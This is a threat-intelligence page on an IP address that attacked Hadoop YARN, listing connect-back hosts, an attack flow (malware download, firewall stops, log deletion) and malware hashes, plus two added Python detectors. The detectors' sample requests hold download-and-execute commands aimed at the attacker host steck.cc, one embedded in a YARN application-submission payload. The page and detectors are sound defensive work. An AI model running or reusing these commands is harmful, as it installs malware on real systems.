IP Address: 206.189.182.1 - Previously Malicious



This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

HadoopYARN

Tags

HTTP, Log Tampering, HadoopYARN, Malicious File, IDS - Web Application Attack, Outgoing Connection, Download and Allow Execution, Download and Execute, Access Suspicious Domain, Download File, Inbound HTTP Request, Service Stop

Connect Back Servers

steck.cc

104.46.40.157 52.174.52.111 13.92.238.45 13.81.222.239 40.87.71.177 52.173.83.168 40.71.227.128 23.101.128.211 40.71.192.77 46.101.229.141 40.112.57.175 13.95.80.40 52.186.125.0 13.94.211.122 52.178.117.234 52.179.125.15 52.166.121.133 104.41.149.18 52.232.33.74 40.117.44.182 52.173.243.215 40.117.238.114 13.93.93.21 52.233.179.93 52.173.80.33 13.73.167.164 52.166.206.33 52.233.143.163 40.114.243.66 40.69.187.176

Basic Information

IP Address

206.189.182.1

Domain

-

ISP

DigitalOcean, LLC

Country

United States

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-10-07

Last seen in Guardicore Centra

2018-11-01

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

Process /usr/bin/wget generated outgoing network traffic to: steck.cc:80

Outgoing Connection

Process /usr/bin/wget attempted to access suspicious domains: steck.cc

Access Suspicious Domain Outgoing Connection

IDS detected Web Application Attack : 401TRG Generic Webshell Request - POST with wget in body

IDS - Web Application Attack

The file /tmp/Trio.x86 was downloaded and executed 387 times

Download and Execute

Process /tmp/Trio.x86 generated outgoing network traffic to: steck.cc:23 and 81.4.101.221:23

Outgoing Connection

Process /tmp/Trio.x86 attempted to access suspicious domains: steck.cc

Access Suspicious Domain Outgoing Connection

Service iptables was stopped 31 times

Service Stop

Service firewalld was stopped 31 times

Service Stop

Log File Tampering detected from /bin/rm on the following logs: /var/log/apt/apt.log, /var/log/dmesg, /var/log/faillog, /var/log/mysql/mysql_error.log, /var/log/dpkg.log, /var/log/apt/term.log, /var/log/apt/history.log, /var/log/alternatives.log, /var/log/btmp, /var/log/fsck/checkroot, /var/log/lastlog, /var/log/wtmp, /var/log/bootstrap.log and /var/log/fsck/checkfs

Log Tampering

The file /bin/rm was downloaded and executed 2 times

Download and Execute

The file /usr/local/bin/dash was downloaded and executed 2 times

Download and Execute

The file /usr/bin/pgrep was downloaded and executed

Download and Execute

The file /sbin/xtables-multi was downloaded and executed

Download and Execute

Connection was closed due to timeout

/tmp/Trio.x86 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File
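The IDS hit in the attack flow (a POST whose body carries a wget command) together with the targeted service (HadoopYARN) is the shape of command submission through an exposed YARN ResourceManager REST API, where the submitted application's launch command is simply run on a node. The page does not record the request path, so the detector below is an added example, not Guardicore's IDS logic or the 401TRG signature itself: it parses raw HTTP requests, flags any POST whose body contains a wget/curl fetch of a URL, and raises the severity when the path falls under the YARN application-submission prefix. The /ws/v1/cluster/apps prefix, the sample requests and the application ID are assumptions constructed for the example.

```python
import re
from typing import Optional

# Download primitive in a request body: wget or curl followed by a URL, the
# pattern the "POST with wget in body" class of IDS signature keys on.
DOWNLOADER_RE = re.compile(
    r"\b(?:wget|curl)\b[^;&|\r\n]*?https?://[^\s'\";&|]+", re.IGNORECASE
)
# Assumption (not stated on the page): the Hadoop YARN ResourceManager REST
# prefix under which an application, and with it a shell command, is submitted.
YARN_SUBMIT_PREFIX = "/ws/v1/cluster/apps"


def parse_request(raw: str) -> Optional[dict]:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        return None
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": parts[0].upper(), "path": parts[1],
            "headers": headers, "body": body}


def classify(raw: str) -> Optional[dict]:
    """Return a finding for a POST whose body fetches a remote file, else None."""
    req = parse_request(raw)
    if req is None or req["method"] != "POST":
        return None
    match = DOWNLOADER_RE.search(req["body"])
    if match is None:
        return None
    finding = {"path": req["path"], "downloader": match.group(0),
               "severity": "medium",
               "reason": "POST body contains a wget/curl download"}
    if req["path"].startswith(YARN_SUBMIT_PREFIX):
        finding["severity"] = "high"
        finding["reason"] = "download command submitted to the YARN RM REST API"
    return finding


def scan(requests) -> list:
    """Classify every request and keep only the findings."""
    return [f for f in (classify(r) for r in requests) if f is not None]


def _req(method, path, body="", content_type="application/json"):
    # Helper to build a constructed raw request with CRLF framing.
    return (f"{method} {path} HTTP/1.1\r\nHost: 10.0.0.5:8088\r\n"
            f"Content-Type: {content_type}\r\n\r\n{body}")


# Constructed sample traffic (not captured from the incident on this page).
SAMPLE_REQUESTS = [
    # YARN application submission whose launch command is a download-and-run.
    _req("POST", "/ws/v1/cluster/apps",
         '{"application-id":"application_1538906400000_0007","application-name":"x",'
         '"am-container-spec":{"commands":{"command":"cd /tmp; wget http://steck.cc/x'
         ' -O Trio.x86; chmod +x Trio.x86; ./Trio.x86"}},"application-type":"YARN"}'),
    # Generic webshell-style POST with the same primitive in a form body.
    _req("POST", "/upload.php", "cmd=wget http://steck.cc/x -O /tmp/x; sh /tmp/x",
         "application/x-www-form-urlencoded"),
    # Read-only API call: not a POST.
    _req("GET", "/ws/v1/cluster/apps"),
    # Legitimate first step of the submission flow: POST, but no command in it.
    _req("POST", "/ws/v1/cluster/apps/new-application"),
    # Mentions wget but carries no URL: must not fire.
    _req("POST", "/api/notes", '{"text":"used wget to mirror the wiki last night"}'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f["severity"], f["path"], f["downloader"], "-", f["reason"])
```

The regex is deliberately narrow (a downloader token followed by a URL on the same command) so that prose mentioning wget, or a bare new-application call, does not fire; the path check is what turns a generic webshell-style hit into a high-confidence YARN RCE indicator, and the first thing to verify on a hit is whether port 8088 is reachable from the source address at all.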

Associated Files

/tmp/Trio.x86

SHA256: fa50ae9fd97a8254ded0f083256201d996795de774915e815d6bcdccfcd42647

11677 bytes

/tmp/hoho.x86.8

SHA256: dbb4593d02f3e0099507f4f72d4cf373f33ccc5bc0fa49c47ddf8d702b3263fb

11679 bytes

/tmp/TrioSec.x86

SHA256: 4afbb25a82cf8909f7d8b24484aaa272c442077b3dc73664a47b6a2c87e501ed

99157 bytes

/tmp/TrioSec.x86

SHA256: b8eca9942a81158fef96f0a81789957586ab249c2e1c8f408f20ad8f7f9eb3f3

11680 bytes

/tmp/TrioSec.x86

SHA256: 17eab3ffcf12eda9414b81f52a774df18bbaafe3eb4ff76b58f1c88c52d5db43

27616 bytes

/tmp/TrioSec.x86

SHA256: e08e53630f06e8c0ca4dc40fff575d0634314f6848fbe8133a49f71f3dd10d56

56832 bytes

/tmp/Trio.x86

SHA256: 01ad20e86e33007f8c35918448408c77b182492686e40c6b27823e55d45aa728

108742 bytes

/tmp/Trio.x86

SHA256: 4e3fffe6d79623b03eee5457095683937965cee8400c427c669bec985d89ad68

99125 bytes

/tmp/Trio.x86

SHA256: 9aa86f35c6437818c01d845feb1e5985f4f060a598ab33b84c561f848c334c1c

26286 bytes

/tmp/Trio.x86

SHA256: 0e2fbd9812a4183bb8c9983142b71e67e4016d6daabf52af1983f70c85c11a72

13006 bytes

/tmp/TrioSec.x86

SHA256: ce71a21a1c246280ab3a29f2dc44f94dd99a79f6bb26896811629b4ea5a4b797

108742 bytes

/tmp/TrioSec.x86

SHA256: 363008e80a93570aef53330df853fd3bc381fdb68b6ec2fb37b7e091f9194740

35584 bytes

/tmp/TrioSec.x86

SHA256: e0d8516855a04c72f4fc9ff5619c09b2234eaac1ebbc55b6ca639e9d18d0e10f

71440 bytes

/tmp/TrioSec.x86

SHA256: 74cab63a3b0fbc79a1dd47a064aa7e0774e332c413c50ee3ff5b2223e87367af

91360 bytes

/tmp/TrioSec.x86

SHA256: 808891a08fa9e42e87052dd89cfcdf957f1324da5d00997a83d083a77d367836

26288 bytes

/tmp/TrioSec.x86

SHA256: 2cbd9a263d675b6b447311576f0298cd3197cfe20c0521810cbbeb012156415e

96672 bytes
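Read together, the attack flow and the file list describe one chain on the host: wget writes into /tmp, the dropped binary runs, it connects back over port 23, it stops iptables and firewalld, and rm clears /var/log. The following is an added example, not Guardicore's or Centra's code, that rebuilds that chain from constructed host telemetry using indicators published on this page (three of the SHA256 values above, the connect-back hosts steck.cc and 81.4.101.221, and the two stopped services). The event schema, the hostnames n1 and n2, and the benign admin activity on n2 are assumptions made for the example.

```python
import re
from collections import defaultdict
from typing import Optional

# Indicators taken from this page: a sample of the "Associated Files" hashes,
# the connect-back hosts from "Attack Flow", and the services the binary stopped.
IOC_SHA256 = {
    "fa50ae9fd97a8254ded0f083256201d996795de774915e815d6bcdccfcd42647",  # /tmp/Trio.x86
    "dbb4593d02f3e0099507f4f72d4cf373f33ccc5bc0fa49c47ddf8d702b3263fb",  # /tmp/hoho.x86.8
    "4afbb25a82cf8909f7d8b24484aaa272c442077b3dc73664a47b6a2c87e501ed",  # /tmp/TrioSec.x86
}
C2_HOSTS = {"steck.cc", "81.4.101.221"}
FIREWALL_SERVICES = {"iptables", "firewalld"}
DROPPER_NAME_RE = re.compile(r"/tmp/(?:Trio|TrioSec|hoho)\.x86")
TELNET_PORT = 23


def stage_of(ev: dict) -> Optional[str]:
    """Map one host event to a stage of this page's attack flow, or None."""
    kind = ev["type"]
    if kind == "exec":
        path = ev["path"]
        if path.endswith(("/wget", "/curl")) and "/tmp/" in ev.get("args", ""):
            return "download"            # downloader writing into /tmp
        if path.startswith("/tmp/") and (
            ev.get("sha256") in IOC_SHA256 or DROPPER_NAME_RE.search(path)
        ):
            return "execute"             # known dropper run from /tmp
    elif kind == "connect":
        downloader = ev["proc"].endswith(("/wget", "/curl"))
        if ev["dst"] in C2_HOSTS:
            return "download" if downloader else "connect_back"
        if ev["port"] == TELNET_PORT and ev["proc"].startswith("/tmp/"):
            return "connect_back"        # a /tmp binary talking telnet
    elif kind == "service_stop":
        if ev["service"] in FIREWALL_SERVICES:
            return "defense_evasion"
    elif kind == "file_delete":
        if ev["proc"].endswith("/rm") and ev["path"].startswith("/var/log/"):
            return "log_tampering"
    return None


def correlate(events) -> dict:
    """Per host, the distinct stages observed, in first-seen order."""
    seen = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(ev)
        if stage and stage not in seen[ev["host"]]:
            seen[ev["host"]].append(stage)
    return dict(seen)


def verdict(stages) -> str:
    """A chain needs the dropper to have run plus two more stages."""
    if "execute" in stages and len(stages) >= 3:
        return "malicious"
    return "suspicious" if stages else "benign"


# Constructed telemetry (assumed schema, not from the page): one dict per event.
EVENTS = [
    {"ts": 1, "host": "n1", "type": "exec", "path": "/usr/bin/wget",
     "args": "http://steck.cc/x -O /tmp/Trio.x86"},
    {"ts": 2, "host": "n1", "type": "connect", "proc": "/usr/bin/wget",
     "dst": "steck.cc", "port": 80},
    {"ts": 3, "host": "n1", "type": "exec", "path": "/tmp/Trio.x86",
     "sha256": "fa50ae9fd97a8254ded0f083256201d996795de774915e815d6bcdccfcd42647"},
    {"ts": 4, "host": "n1", "type": "connect", "proc": "/tmp/Trio.x86",
     "dst": "81.4.101.221", "port": 23},
    {"ts": 5, "host": "n1", "type": "service_stop", "service": "iptables"},
    {"ts": 6, "host": "n1", "type": "service_stop", "service": "firewalld"},
    {"ts": 7, "host": "n1", "type": "file_delete", "proc": "/bin/rm",
     "path": "/var/log/wtmp"},
    # n2: routine admin work touching the same tools, which never chains.
    {"ts": 8, "host": "n2", "type": "exec", "path": "/usr/bin/wget",
     "args": "https://mirror.internal/pkg.deb -O /var/cache/apt/pkg.deb"},
    {"ts": 9, "host": "n2", "type": "connect", "proc": "/usr/bin/wget",
     "dst": "mirror.internal", "port": 443},
    {"ts": 10, "host": "n2", "type": "service_stop", "service": "firewalld"},
    {"ts": 11, "host": "n2", "type": "file_delete", "proc": "/bin/rm",
     "path": "/home/ops/notes.txt"},
]

if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(host, verdict(stages), "->", " > ".join(stages))
```

Note that the same path (/tmp/TrioSec.x86, /tmp/Trio.x86) appears above with many different hashes and sizes, so a hash list alone lags the attacker; the example therefore accepts either a listed hash or the dropper filename pattern for the execute stage, and relies on the chain (execute plus two further stages) rather than any single event to call a host malicious. A lone firewalld stop on n2 stays at suspicious, which is the right outcome for a change window.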
